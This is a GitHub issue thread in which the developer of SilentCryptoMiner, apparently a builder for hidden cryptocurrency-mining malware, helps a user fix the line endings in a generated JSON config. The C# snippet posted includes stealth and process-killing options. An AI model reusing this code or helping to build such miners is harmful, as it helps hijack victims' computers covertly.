### ISSUE TITLE
renders JSON incorrectly

### ISSUE THREAD

**Issue by svox07** [UnamSanctam/SilentCryptoMiner#2312]
Hello Unam I compiled the source code, and did a Build, and my JSON is not rendering correctly.
![IMG_20240402_203113_511](https://github.com/UnamSanctam/SilentCryptoMiner/assets/70852343/fe1eaacb-67af-4ad1-8ee3-67879466bfae)

**Comment by UnamSanctam** [comment]
It's probably because GitHub changes the line endings in the code from Windows format to Unix. You can change it in the code if you want but that format in your screenshot will also work, just a bit harder to read.

**Comment by svox07** [comment]
If it’s not difficult, point out where it needs to be corrected

**Comment by UnamSanctam** [comment]
In the code for the form(s)
https://github.com/UnamSanctam/SilentCryptoMiner/blob/c61e842d5ec04e2493a83f54f096ba2f3b95687d/SilentCryptoMiner/Forms/MinerXMR.cs#L67
then you can probably remove the new lines and then add them back again (make all the lines in the string go on the same line and then add them back using enter).

**Comment by svox07** [comment]
If it’s not too much trouble, you can upload it separately, this is the corrected file MinerXMR.cs

**Comment by svox07** [comment]
as you described it did not do not change you can send this section of code in txt format

**Comment by UnamSanctam** [comment]
You can likely just change it to something like this:
```
$@"{{{Environment.NewLine}
    ""algo"": ""{comboAlgorithm.Text}"",{Environment.NewLine}
    ""pool"": ""{txtPoolURL.Text.Split(':')[0]}"",{Environment.NewLine}
    ""port"": {txtPoolURL.Text.Split(':')[1]},{Environment.NewLine}
    ""wallet"": ""{txtPoolUsername.Text}"",{Environment.NewLine}
    ""password"": ""{txtPoolPassword.Text}"",{Environment.NewLine}
    ""nicehash"": {toggleNicehash.Checked.ToString().ToLower()},{Environment.NewLine}
    ""ssltls"": {toggleSSL.Checked.ToString().ToLower()},{Environment.NewLine}
    ""max-cpu"": {comboMaxCPU.Text.Replace("%", "")},{Environment.NewLine}
    ""idle-wait"": {(toggleIdle.Checked ? txtIdleWait.Text : "0")},{Environment.NewLine}
    ""idle-cpu"": {comboIdleCPU.Text.Replace("%", "")},{Environment.NewLine}
    ""stealth-targets"": ""{(toggleStealth.Checked ? txtStealthTargets.Text : "")}"",{Environment.NewLine}
    ""kill-targets"": ""{(toggleProcessKiller.Checked ? txtKillTargets.Text : "")}"",{Environment.NewLine}
    ""stealth-fullscreen"": {toggleStealthFullscreen.Checked.ToString().ToLower()}{Environment.NewLine}
}}";
```

**Comment by svox07** [comment]
thanks it worked
